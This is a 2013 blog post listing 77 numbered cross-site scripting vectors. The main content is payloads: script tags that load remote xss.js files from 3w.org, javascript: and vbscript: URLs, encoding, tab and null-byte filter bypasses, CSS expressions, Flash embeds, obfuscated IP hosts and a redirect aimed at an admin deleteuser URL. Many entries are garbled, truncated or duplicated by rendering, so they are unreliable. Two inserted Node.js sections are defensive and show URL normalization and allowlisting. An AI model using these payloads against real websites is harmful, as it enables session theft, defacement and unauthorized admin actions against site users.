XSS cross-site scripting attacks

Jonty
2013-09-04
(1) Plain XSS JavaScript injection
<script type="text/javascript" src="http://3w.org/XSS/xss.js"></script>
(2) IMG tag XSS using a JavaScript command
<script type="text/javascript" src="http://3w.org/XSS/xss.js"></script>
(3) IMG tag, no semicolon and no quotes
<img alt="" src="javascript:alert('XSS')" />
(4) IMG tag, case-insensitive
<img alt="" src="JaVaScRiPt:alert('XSS')" />
(5) HTML encoding (semicolons required)
<img alt="" src="javascript:alert("XSS")" />
(6) Malformed IMG tag
<img alt="" /><script type="text/javascript">alert("XSS")</script>" />
(7) fromCharCode (calculator)
<img alt="" src="javascript:alert(String.fromCharCode(88,83,83))" />
(8) UTF-8 Unicode encoding (calculator)
<img alt="" src="jav..omitted..S')" />
(9) 7-digit UTF-8 Unicode encoding with no semicolons (calculator)
<img alt="" src="jav..omitted..S')" />
(10) Hex encoding, also with no semicolons (calculator)
<img alt="" src="java..omitted..XSS')" />
(11) Embedded tab, splitting up the JavaScript
<img alt="" src="jav" />
(12) Embedded encoded tab, splitting up the JavaScript
<img alt="" src="jav" />
(13) Embedded newline
<img alt="" src="jav" />
(14) Embedded carriage return
<img alt="" src="jav" />
(15) Embedded multi-line JavaScript injection; an extreme XSS example
<img alt="" src="javascript:alert('XSS')" />
(16) Working around a character limit (the pieces must be on the same page)
<script type="text/javascript">z='document.'</script>
<script type="text/javascript">z=z+'write("'</script>
<script type="text/javascript">z=z+'<script'</script>
<script type="text/javascript">z=z+' src=ht'</script>
<script type="text/javascript">z=z+'tp://ww'</script>
<script type="text/javascript">z=z+'w.shell'</script>
<script type="text/javascript">z=z+'.net/1.'</script>
<script type="text/javascript">z=z+'js></sc'</script>
<script type="text/javascript">z=z+'ript>")'</script>
<script type="text/javascript">eval(z)</script>
(17) Null character
perl -e 'print "<img alt="" src="java\0script:alert(\"XSS\")" />
(18) Null character 2. Null characters are basically useless domestically, because there is nowhere to make use of them.
perl -e 'print "<img scr="alert(\"XSS\")";' />
(19) Spaces and meta characters before the IMG tag
<img alt="" src="" />
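Entries (3) through (19) all reach the same browser behaviour, a javascript: (or vbscript:) URL inside an attribute, through a different spelling: mixed case, decimal and hex character references with or without semicolons, embedded tabs, newlines and carriage returns, null bytes, and surrounding whitespace. The defensive consequence is that a filter inspecting the raw attribute value is always one spelling behind; the value has to be decoded and normalized first, and only an allowlist of schemes should pass. The following is an added example, not code from the original post, written for Node.js with no dependencies. The names decodeEntities, normalizeUrl, safeUrlAttribute, escapeHtml and renderLink are chosen here, the named-entity table is deliberately limited to references that matter for scheme smuggling, and the sample inputs at the bottom are constructed.

```javascript
// Added defensive example, not part of the original post. Assumptions: plain
// Node.js, no dependencies; all function names are chosen here.

// Schemes permitted in href/src values. Everything else, including
// javascript:, vbscript: and data:, is rejected.
const ALLOWED_SCHEMES = new Set(["http:", "https:"]);

// Named references that matter for smuggling a scheme past a filter. A full
// HTML5 entity table would be used in production; this one is deliberately small.
const NAMED_REFS = {
  lt: "<", gt: ">", amp: "&", quot: '"', apos: "'",
  colon: ":", tab: "\t", newline: "\n",
};

// Decode HTML character references once, the way a browser does for an
// attribute value. Decimal (&#106;), hex (&#x6A;) and long zero-padded forms
// are accepted with or without the trailing semicolon, which is what
// entries (5) and (8)-(10) depend on. Unknown names are left untouched.
function decodeEntities(s) {
  return String(s).replace(/&(?:#x([0-9a-f]+)|#([0-9]+)|([a-z]+));?/gi, (match, hex, dec, name) => {
    if (hex !== undefined || dec !== undefined) {
      const code = hex !== undefined ? parseInt(hex, 16) : parseInt(dec, 10);
      return code > 0x10ffff ? match : String.fromCodePoint(code);
    }
    const value = NAMED_REFS[name.toLowerCase()];
    return value === undefined ? match : value;
  });
}

// Remove the characters a browser ignores inside a URL: ASCII controls such
// as tab, newline, carriage return and NUL (entries (11)-(14) and (17)) and
// surrounding whitespace (entry (19)).
function normalizeUrl(raw) {
  return decodeEntities(raw).replace(/[\u0000-\u001f\u007f]/g, "").trim();
}

// Return the normalized URL if its scheme is allowed (or it is a
// site-relative path), otherwise null. The scheme comparison is
// case-insensitive, which covers entry (4).
function safeUrlAttribute(raw) {
  const url = normalizeUrl(raw);
  const scheme = /^([a-z][a-z0-9+.-]*):/i.exec(url);
  if (scheme) {
    return ALLOWED_SCHEMES.has(scheme[1].toLowerCase() + ":") ? url : null;
  }
  // No scheme: accept "/path" but not "//host" or "/\host", which browsers
  // treat as scheme-relative.
  return url === "/" || /^\/[^\/\\]/.test(url) ? url : null;
}

// Escape text for an HTML text node or a double-quoted attribute value.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Build an anchor from an untrusted href and text. If the href does not pass,
// the text is still shown but no link is emitted.
function renderLink(href, text) {
  const safeHref = safeUrlAttribute(href);
  if (safeHref === null) return escapeHtml(text);
  return `<a href="${escapeHtml(safeHref)}">${escapeHtml(text)}</a>`;
}

// Constructed sample inputs covering the spellings in the entries above.
const SAMPLES = [
  "javascript:alert('XSS')",
  "JaVaScRiPt:alert('XSS')",
  "&#106;avascript:alert('XSS')",
  "&#x6A;avascript:alert('XSS')",
  "&#0000106avascript:alert('XSS')",
  "jav\tascript:alert('XSS')",
  "jav&#x0A;ascript:alert('XSS')",
  "java\u0000script:alert('XSS')",
  " javascript:alert('XSS')",
  "vbscript:msgbox(\"XSS\")",
  "//www.example.com/",
  "http://www.example.com/?a=1&b=2",
  "/account/settings",
];

for (const sample of SAMPLES) {
  console.log(JSON.stringify(sample), "->", JSON.stringify(safeUrlAttribute(sample)));
}
```

A production implementation would swap in a complete entity decoder but keep the same order of operations: decode once, as the browser does for an attribute value, strip the control characters the browser ignores, and only then compare the scheme against an allowlist. Block-listing the literal string "javascript" is exactly what every entry above is built to defeat.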
(20) Non-alpha-non-digit XSS
<script type="text/javascript" src="http://3w.org/XSS/xss.js"></script>
(21) Non-alpha-non-digit XSS 2
(22) Non-alpha-non-digit XSS 3
<script type="text/javascript" src="http://3w.org/XSS/xss.js"></script>
(23) Double open brackets
<<script type="text/javascript">alert("XSS");//<</script>
(24) No closing script tag (Firefox and similar browsers only)
<script type="text/javascript" src="http://3w.org/XSS/xss.js?<B">
(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>
(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"
(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <
</iframe>
(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)
</SCRIPT>
(29) Escaping JavaScript escapes
\";alert('XSS');//
(30) Closing the TITLE tag
<script type="text/javascript">alert("XSS");</script>
(31) Input Image
<input type="text" src="javascript:alert('XSS');" />
(32) BODY Image

(33) BODY tag
<body('xss')>
(34) IMG Dynsrc
<img alt="" />
(35) IMG Lowsrc
<img alt="" />
(36) BGSOUND

(37) STYLE sheet
<link href="javascript:alert('XSS');" rel="stylesheet" />
(38) Remote style sheet
<link href="http://3w.org/xss.css" rel="stylesheet" />
(39) List-style-image
<style><!--
li {list-style-image: url("javascript:alert('XSS')");}
--></style>
<ul>
<li>XSS
(40) IMG VBScript
<img alt="" src="'vbscript:msgbox("XSS")'" />
(41) META link URL
<meta http-equiv="refresh" content="0;" />
(42) Iframe
<iframe width="320" height="240" src="javascript:alert('XSS');"></iframe>
(43) Frame

(44) Table
(45) TD
<table>
<tbody>
<tr>
<td>
(46) DIV background-image
<div>
(47) DIV background-image followed by extra characters (1-32&34&39&160&8192-8&13&12288&65279)
<div>
(48) DIV expression
<div>
(49) STYLE attribute with a split-up expression
<img style="xss: expression(alert('XSS'));" alt="" />
(50) Anonymous STYLE (made up of an open angle bracket followed by a letter)
(51) STYLE background-image
<style><!--
.XSS{background-image:url("javascript:alert('XSS')");}
--></style>
(52) IMG STYLE approach
exppression(alert("XSS"))'>
(53) STYLE background
<style><!--
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}
--></style>
(54) BASE
(55) EMBED tag: you can embed a Flash movie that contains XSS
<object width="320" height="240" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="src" value="http://3w.org/XSS/xss.swf" /><embed width="320" height="240" type="application/x-shockwave-flash" src="http://3w.org/XSS/xss.swf" /></object>
(56) ActionScript inside a Flash movie can be used to smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);
(57) XML namespace. The .htc file must be on the same server as your XSS vector
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
XSS
(58) If your JS is filtered, you can put the JS code inside an image and use that
<script type="text/javascript" src=""></script>
(59) IMG embedded command; can execute arbitrary commands
<img alt="" src="http://www.XXX.com/a.php?a=b" />
(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
(61) Bypassing symbol filters
<script type="text/javascript">
" SRC="http://3w.org/xss.js">
</script>
(62)
<script type="text/javascript">
" SRC="http://3w.org/xss.js">
</script>
(63)
<script type="text/javascript">
" " SRC="http://3w.org/xss.js">
</script>
(64)
<script type="text/javascript">
'" SRC="http://3w.org/xss.js">
</script>
(65)
<script type="text/javascript">
` SRC="http://3w.org/xss.js">
</script>
(66)
<script type="text/javascript">
'>" SRC="http://3w.org/xss.js">
</script>
(67)
<script type="text/javascript">document.write("<SCRI");</script>PT SRC="http://3w.org/xss.js">
(68) URL bypass
<a href="http://127.0.0.1/">XSS</a>
(69) URL encoding
<a href="http://3w.org">XSS</a>
(70) IP in decimal
<a href="http://3232235521">XSS</a>
(71) IP in hexadecimal
<a href="http://0xc0.0xa8.0x00.0x01">XSS</a>
(72) IP in octal
<a href="http://0300.0250.0000.0001">XSS</a>
(73) Mixed encoding
tt p://6 6.000146.0x7.147/">XSS
(74) Leaving out [http:]
<a href="//www.google.com/">XSS</a>
(75) Leaving out [www]
<a href="http://google.com/">XSS</a>
(76) Absolute DNS with a trailing dot
<a href="http://www.google.com./">XSS</a>
(77) javascript link
<a href="javascript:document.location='http://www.google.com/'">XSS</a>
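Entries (68) through (76) are not script injection; they are alternative spellings of a host that a naive allowlist or "must not link to this domain" check will not recognize: a bare 32-bit decimal, hex and octal parts, mixed radixes with tabs inside, a scheme-relative URL and a trailing dot. The defence is to canonicalize the host before comparing it. Browsers that follow the WHATWG URL standard already do this for IPv4 literals, so the added example that follows (not from the original post; Node.js with no dependencies, and the names parseIpPart, canonicalHost and isAllowedRedirectTarget are chosen here) spells the rule out explicitly, which is useful when the same comparison has to be made over log fields or through a legacy parser, and then applies it through Node's built-in URL class for an allowlist check. The host strings at the bottom are constructed samples.

```javascript
// Added defensive example, not part of the original post. Assumptions: plain
// Node.js (the WHATWG URL class is global); all function names are chosen here.

// Parse one dotted-IP part as browsers do: a "0x" prefix means hex, a leading
// zero means octal, anything else is decimal. Returns NaN for a non-number.
function parseIpPart(part) {
  if (/^0x[0-9a-f]*$/i.test(part)) return part.length === 2 ? 0 : parseInt(part.slice(2), 16);
  if (/^0[0-7]*$/.test(part)) return part.length === 1 ? 0 : parseInt(part.slice(1), 8);
  if (/^[1-9][0-9]*$/.test(part)) return parseInt(part, 10);
  return NaN;
}

// Canonical form of a host: a dotted quad for any IPv4 spelling (entries
// (70)-(73)), a lowercased name without trailing dot for a domain (entry (76)),
// or null when the value is not a valid host.
function canonicalHost(rawHost) {
  // Tab, newline and carriage return are deleted from a URL before parsing.
  const host = String(rawHost).replace(/[\t\n\r]/g, "").trim().toLowerCase();
  const parts = host.split(".");
  if (parts.length > 1 && parts[parts.length - 1] === "") parts.pop(); // trailing dot
  const last = parts[parts.length - 1];
  // A host whose last part looks like a number is parsed as IPv4 or fails.
  if (!/^(0x[0-9a-f]*|[0-9]+)$/i.test(last)) {
    return parts.every((p) => p.length > 0) ? parts.join(".") : null;
  }
  if (parts.length > 4) return null;
  const nums = parts.map(parseIpPart);
  if (nums.some(Number.isNaN)) return null;
  const head = nums.slice(0, -1);
  const tail = nums[nums.length - 1];
  // Leading parts are one byte each; the last part fills the remaining bytes.
  if (head.some((n) => n > 255) || tail >= 256 ** (5 - nums.length)) return null;
  let value = tail;
  head.forEach((n, i) => { value += n * 256 ** (3 - i); });
  return [24, 16, 8, 0].map((shift) => Math.floor(value / 2 ** shift) % 256).join(".");
}

// Allow a link or redirect target only if it is absolute http(s) and its
// canonical host is on the allowlist. A scheme-relative "//host" (entry (74))
// has no base here, so the parser rejects it; "javascript:" fails the scheme check.
function isAllowedRedirectTarget(href, allowedHosts) {
  let parsed;
  try {
    parsed = new URL(String(href).replace(/[\t\n\r]/g, ""));
  } catch (e) {
    return false;
  }
  if (parsed.protocol !== "http:" && parsed.protocol !== "https:") return false;
  const host = canonicalHost(parsed.hostname);
  return host !== null && allowedHosts.includes(host);
}

// Constructed samples: the spellings from the entries above.
const HOSTS = [
  "3232235521",
  "0xc0.0xa8.0x00.0x01",
  "0300.0250.0000.0001",
  "6\t6.000146.0x7.147",
  "www.google.com.",
  "0xc0.0xa8.1",
  "08.1.1.1",
];
for (const h of HOSTS) console.log(JSON.stringify(h), "->", canonicalHost(h));
```

The comparison is done on the canonical host, never on the raw link text, and the allowlist holds canonical values only; a host that fails to parse is treated as not allowed rather than passed through.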